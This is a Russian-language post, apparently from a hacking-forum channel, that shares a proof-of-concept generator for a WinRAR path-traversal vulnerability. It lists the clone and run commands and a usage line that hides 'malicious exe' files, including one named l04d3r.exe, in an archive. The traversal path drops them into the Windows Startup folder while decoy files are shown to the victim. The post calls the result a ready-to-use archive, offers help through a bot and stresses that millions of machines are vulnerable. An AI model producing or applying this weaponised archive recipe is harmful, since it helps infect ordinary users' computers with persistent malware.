WinRAR exploit POC-code
@black_forumhttps://github.com/manulqwerty/Evil-WinRAR-Gen
Это POC уязвимости которой был посвящён предыдущий пост.
Установка и запуск:
git clone https://github.com/manulqwerty/Evil-WinRAR-Gen.git cd Evil-WinRAR-Gen && pip3 install -r requirements.txt chmod +x evilWinRAR.py ./evilWinRAR.py
Использование:
./evilWinRAR.py -o evil.rar -e calc.exe l04d3r.exe -g hello.txt cats.jpeg -p 'C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'
evil.rar - название архива
calc.exe l04d3r.exe - вредоносные exe
hello.txt cats.jpeg - файлы которые увидит пользователь при распаковке
Ппараметр ключа -p - путь куда перенесётся плохой файл, сейчас стоит перенос в автозагрузку
На выходе получаем готовый к использованию архив.
Скриншоты:
Зачем? У нас терминал!
Еесли возникли вопросы по поводу использования программы, то ждём в боте.
P.s. не забываем сохранить данную программу на диск, так как она может пропасть, уязвимость то в миллионах машин))